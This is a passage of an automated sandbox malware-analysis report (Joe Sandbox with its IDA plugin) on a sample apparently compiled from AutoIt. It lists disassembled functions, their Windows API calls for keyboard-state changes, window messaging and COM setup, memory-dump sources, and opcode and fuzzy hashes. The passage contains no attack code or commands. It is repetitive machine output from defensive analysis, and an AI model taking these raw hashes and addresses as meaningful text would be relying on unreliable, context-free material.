                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 3864802216-0
                                                                                                            • Opcode ID: 51a2a40c611c628a6915611ea4b8bfd99d64038db5f773fccde8ec66075e71fb
                                                                                                            • Instruction ID: bb5bb7cbc37cce5ccd7f632dc83455478e84f13ae689659356404fe670e4f2e3
                                                                                                            • Opcode Fuzzy Hash: 51a2a40c611c628a6915611ea4b8bfd99d64038db5f773fccde8ec66075e71fb
                                                                                                            • Instruction Fuzzy Hash: B8318B72211294BBEB119F558C8AFFB3BADEB49721F084055FE08DE2A1C6759C41CBB0
                                                                                                            Function 00DB5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 2931989736-0
                                                                                                            • Opcode ID: b6ef61edb8e106ab3801818ad7b4050e784efac854ebaa1e5340c91927e8de7b
                                                                                                            • Instruction ID: a6e8862966b6be1c94d7b41e3daa03ace776525387003e79edb2aa5447abfb37
                                                                                                            • Opcode Fuzzy Hash: b6ef61edb8e106ab3801818ad7b4050e784efac854ebaa1e5340c91927e8de7b
                                                                                                            • Instruction Fuzzy Hash: F5210B75740A09FBE2146625AD82FFF335CEF20788F684124FD0A9A585FB20EE1582B5
                                                                                                            Function 00DD4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                                                            • API String ID: 0-572801152
                                                                                                            • Opcode ID: ce1a6e72afb621c1fea6dcbe8b94949d0ee68ec3159ab3eadd471219c3cd91b1
                                                                                                            • Instruction ID: 891cfcdaeea7f3332ba32037306233d9b15e0c8f4994dafa521df4e7f4862911
                                                                                                            • Opcode Fuzzy Hash: ce1a6e72afb621c1fea6dcbe8b94949d0ee68ec3159ab3eadd471219c3cd91b1
                                                                                                            • Instruction Fuzzy Hash: 75D17E71A0070A9FDF10CF98D881BAEB7B5BF48344F18816AE915AB385D771ED45CBA0
                                                                                                            Function 00D91522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetCPInfo.KERNEL32(?,?), ref: 00D915CE
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D91651
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D916E4
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00D916FB
                                                                                                              • Part of subcall function 00D83820: RtlAllocateHeap.NTDLL(00000000,?,00E21444,?,00D6FDF5,?,?,00D5A976,00000010,00E21440,00D513FC,?,00D513C6,?,00D51129), ref: 00D83852
                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D91777
                                                                                                            • __freea.LIBCMT ref: 00D917A2
                                                                                                            • __freea.LIBCMT ref: 00D917AE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 2829977744-0
                                                                                                            • Opcode ID: 842dfa024a6272d8d19887f02567e0a2649780d2de521bccbe363e5684c414a8
                                                                                                            • Instruction ID: 1faa4ad0db328fc88c96fa7028d2a306bd0c8267949f75b244f61c9bb3533fcd
                                                                                                            • Opcode Fuzzy Hash: 842dfa024a6272d8d19887f02567e0a2649780d2de521bccbe363e5684c414a8
                                                                                                            • Instruction Fuzzy Hash: A191D27AE002179ADF219FB4C881AEEBBB5EF49710F194659E805E7281DB35CC44CBB0
                                                                                                            Function 00DD4523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit
                                                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                            • API String ID: 2610073882-625585964
                                                                                                            • Opcode ID: 6e45e6a3f9a226cace97b6e10ef8fd14491c82f1f8d572625005aec8c6b0bbf9
                                                                                                            • Instruction ID: 60cda9463eb911d543ac736d57cbe05f88dde5d3a4d423b7affbb01621d526de
                                                                                                            • Opcode Fuzzy Hash: 6e45e6a3f9a226cace97b6e10ef8fd14491c82f1f8d572625005aec8c6b0bbf9
                                                                                                            • Instruction Fuzzy Hash: 09917C71A00219ABDF20CFA5D888FEEBBB8EF46714F14855AF515AB280D7709945CBB0
                                                                                                            Function 00DC1187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 00DC125C
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00DC1284
                                                                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 00DC12A8
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC12D8
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC135F
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC13C4
                                                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00DC1430
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                                                            • String ID:
                                                                                                            • API String ID: 2550207440-0
                                                                                                            • Opcode ID: 2f19646027d8be2b2afbc2f13deb69305f6b8c2516a3fb9b3303eb591c48e6d3
                                                                                                            • Instruction ID: 6e4568206f037dd94f6da15ca4e114587ec0630b1cb1994ccb7cf85ecb14f12d
                                                                                                            • Opcode Fuzzy Hash: 2f19646027d8be2b2afbc2f13deb69305f6b8c2516a3fb9b3303eb591c48e6d3
                                                                                                            • Instruction Fuzzy Hash: 9791E17990022AAFDB01DF94C885FBEB7B5FF46315F244029E940EB292D774A945CBB0
                                                                                                            Function 00D6948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                                                            • String ID:
                                                                                                            • API String ID: 3225163088-0
                                                                                                            • Opcode ID: 41559f457323e160a50fe025bfb1051c7544049b65aeb3acb86f129244b7582b
                                                                                                            • Instruction ID: 9de335e9347c3352d65bb56b9679bc27f2cd24fa07747da766bf484b596bd4ba
                                                                                                            • Opcode Fuzzy Hash: 41559f457323e160a50fe025bfb1051c7544049b65aeb3acb86f129244b7582b
                                                                                                            • Instruction Fuzzy Hash: E6910371900219EFCB10CFA9CC94AEEBBB8FF49320F148559E516B7251D774AA42CBB0
                                                                                                            Function 00DD3947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • VariantInit.OLEAUT32(?), ref: 00DD396B
                                                                                                            • CharUpperBuffW.USER32(?,?), ref: 00DD3A7A
                                                                                                            • _wcslen.LIBCMT ref: 00DD3A8A
                                                                                                            • VariantClear.OLEAUT32(?), ref: 00DD3C1F
                                                                                                              • Part of subcall function 00DC0CDF: VariantInit.OLEAUT32(00000000), ref: 00DC0D1F
                                                                                                              • Part of subcall function 00DC0CDF: VariantCopy.OLEAUT32(?,?), ref: 00DC0D28
                                                                                                              • Part of subcall function 00DC0CDF: VariantClear.OLEAUT32(?), ref: 00DC0D34
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
                                                                                                            • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                            • API String ID: 4137639002-1221869570
                                                                                                            • Opcode ID: febc590d712063d802c4713b75f307e0698d6d9613b377a612ff6e2a3de98422
                                                                                                            • Instruction ID: 75cdd892b4ff969b639262923ba7d05d31b881fecf8f2b09ac49b363e691ff92
                                                                                                            • Opcode Fuzzy Hash: febc590d712063d802c4713b75f307e0698d6d9613b377a612ff6e2a3de98422
                                                                                                            • Instruction Fuzzy Hash: 46916C756083419FCB04DF28C49196AB7E4FF89714F14892EF8899B351DB30EE49CBA2
                                                                                                            Function 00DD4BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DB000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?,?,00DB035E), ref: 00DB002B
                                                                                                              • Part of subcall function 00DB000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0046
                                                                                                              • Part of subcall function 00DB000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?,?), ref: 00DB0054
                                                                                                              • Part of subcall function 00DB000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00DAFF41,80070057,?), ref: 00DB0064
                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00DD4C51
                                                                                                            • _wcslen.LIBCMT ref: 00DD4D59
                                                                                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00DD4DCF
                                                                                                            • CoTaskMemFree.OLE32(?), ref: 00DD4DDA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
                                                                                                            • String ID: NULL Pointer assignment
                                                                                                            • API String ID: 614568839-2785691316
                                                                                                            • Opcode ID: 6935e35a6ba28070989231948061a8d42a378651af65c0f9b2a7b72987e0097b
                                                                                                            • Instruction ID: 0590f29f384ae75b6a21b930df29c558c46e1247dc77c0205b7d7bdf66b1a5fd
                                                                                                            • Opcode Fuzzy Hash: 6935e35a6ba28070989231948061a8d42a378651af65c0f9b2a7b72987e0097b
                                                                                                            • Instruction Fuzzy Hash: B591E771D00219EFDF14DFA4C891AEEBBB9FF08310F10856AE919A7251EB309A458F70
                                                                                                            Function 00DE20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetMenu.USER32(?), ref: 00DE2183
                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 00DE21B5
                                                                                                            • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00DE21DD
                                                                                                            • _wcslen.LIBCMT ref: 00DE2213
                                                                                                            • GetMenuItemID.USER32(?,?), ref: 00DE224D
                                                                                                            • GetSubMenu.USER32(?,?), ref: 00DE225B
                                                                                                              • Part of subcall function 00DB3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB3A57
                                                                                                              • Part of subcall function 00DB3A3D: GetCurrentThreadId.KERNEL32 ref: 00DB3A5E
                                                                                                              • Part of subcall function 00DB3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00DB25B3), ref: 00DB3A65
                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00DE22E3
                                                                                                              • Part of subcall function 00DBE97B: Sleep.KERNEL32 ref: 00DBE9F3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
                                                                                                            • String ID:
                                                                                                            • API String ID: 4196846111-0
                                                                                                            • Opcode ID: f202aacd947b71258bf3c6145390e1993c78fa17e5b36aec3a370aa724019ae0
                                                                                                            • Instruction ID: 07b012342e2c9522ee557e8920105d3838f70827aa8b8083864f9bf178ef7f2c
                                                                                                            • Opcode Fuzzy Hash: f202aacd947b71258bf3c6145390e1993c78fa17e5b36aec3a370aa724019ae0
                                                                                                            • Instruction Fuzzy Hash: 7A718D75A00245AFCB10EF65C881ABEBBF9EF88310F148459E956EB351D734EE418BB0
                                                                                                            Function 00DE7E9E Relevance: 10.7, APIs: 7, Instructions: 193windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • IsWindow.USER32(013E5770), ref: 00DE7F37
                                                                                                            • IsWindowEnabled.USER32(013E5770), ref: 00DE7F43
                                                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00DE801E
                                                                                                            • SendMessageW.USER32(013E5770,000000B0,?,?), ref: 00DE8051
                                                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 00DE8089
                                                                                                            • GetWindowLongW.USER32(013E5770,000000EC), ref: 00DE80AB
                                                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DE80C3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                            • String ID:
                                                                                                            • API String ID: 4072528602-0
                                                                                                            • Opcode ID: 25a24d5d8f2088bed71175d15b8ea687b63797af8efd2a6791340330b2fb3d2e
                                                                                                            • Instruction ID: 34ff37de3b2fc28b07c42aacd6958998ea9d28cca57959e4c0e209dd7035da9f
                                                                                                            • Opcode Fuzzy Hash: 25a24d5d8f2088bed71175d15b8ea687b63797af8efd2a6791340330b2fb3d2e
                                                                                                            • Instruction Fuzzy Hash: 3A719034608284AFEF25EF56C8D4FBABBB9EF09300F184459E94997261CB31AD45DB30
                                                                                                            Function 00DBAEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 00DBAEF9
                                                                                                            • GetKeyboardState.USER32(?), ref: 00DBAF0E
                                                                                                            • SetKeyboardState.USER32(?), ref: 00DBAF6F
                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 00DBAF9D
                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00DBAFBC
                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00DBAFFD
                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00DBB020
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                            • String ID:
                                                                                                            • API String ID: 87235514-0
                                                                                                            • Opcode ID: c0107476f00ff6db99a250ba29e9ae5df10cb71c7d2fe059014c5c7e13588d10
                                                                                                            • Instruction ID: 0468723955138e10df5c478eed4780de067c150e5a92379733b168ed8266a378
                                                                                                            • Opcode Fuzzy Hash: c0107476f00ff6db99a250ba29e9ae5df10cb71c7d2fe059014c5c7e13588d10
                                                                                                            • Instruction Fuzzy Hash: C551C1A0A047D5BDFB3652388845BFABEA95F06314F0C848AF1DA854D2C3D9EC88D771
                                                                                                            Function 00DBACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetParent.USER32(00000000), ref: 00DBAD19
                                                                                                            • GetKeyboardState.USER32(?), ref: 00DBAD2E
                                                                                                            • SetKeyboardState.USER32(?), ref: 00DBAD8F
                                                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00DBADBB
                                                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00DBADD8
                                                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00DBAE17
                                                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00DBAE38
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                            • String ID:
                                                                                                            • API String ID: 87235514-0
                                                                                                            • Opcode ID: c9b581b188e6de1215c87951d60f5d37d87aed04918b418b56eb2737bc549202
                                                                                                            • Instruction ID: 67eccbd4f1205c0981d14310e1165620819704153fa520268738695d25332906
                                                                                                            • Opcode Fuzzy Hash: c9b581b188e6de1215c87951d60f5d37d87aed04918b418b56eb2737bc549202
                                                                                                            • Instruction Fuzzy Hash: 9551C5A16047D5BDFB3783288C95BFA7E995B46300F0C8589F1D64A8D2D294EC84D772
                                                                                                            Function 00D8542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetConsoleCP.KERNEL32(00D93CD6,?,?,?,?,?,?,?,?,00D85BA3,?,?,00D93CD6,?,?), ref: 00D85470
                                                                                                            • __fassign.LIBCMT ref: 00D854EB
                                                                                                            • __fassign.LIBCMT ref: 00D85506
                                                                                                            • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00D93CD6,00000005,00000000,00000000), ref: 00D8552C
                                                                                                            • WriteFile.KERNEL32(?,00D93CD6,00000000,00D85BA3,00000000,?,?,?,?,?,?,?,?,?,00D85BA3,?), ref: 00D8554B
                                                                                                            • WriteFile.KERNEL32(?,?,00000001,00D85BA3,00000000,?,?,?,?,?,?,?,?,?,00D85BA3,?), ref: 00D85584
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                            • String ID:
                                                                                                            • API String ID: 1324828854-0
                                                                                                            • Opcode ID: 3d96f58942765c4a048c2b9c305181ee01b14db6e406ec88b6d5da4809bede31
                                                                                                            • Instruction ID: 36e11d9288c1d6f6f8f347754b4f041f25cc2885384d9157adb171ddb41c17b9
                                                                                                            • Opcode Fuzzy Hash: 3d96f58942765c4a048c2b9c305181ee01b14db6e406ec88b6d5da4809bede31
